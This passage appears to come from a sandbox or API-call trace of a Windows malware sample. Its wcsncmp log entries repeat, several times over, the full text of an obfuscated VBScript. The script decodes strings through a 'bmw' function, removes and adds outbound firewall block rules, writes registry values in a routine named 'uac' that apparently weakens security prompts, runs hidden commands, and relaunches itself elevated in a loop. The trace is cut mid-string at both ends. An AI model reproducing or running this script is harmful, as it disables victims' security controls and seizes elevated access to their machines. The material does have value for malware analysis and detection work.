newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0226.340] wcsncmp (_String1="et rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.340] wcsncmp (_String1="t rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.340] wcsncmp (_String1=" rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.340] wcsncmp (_String1="rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 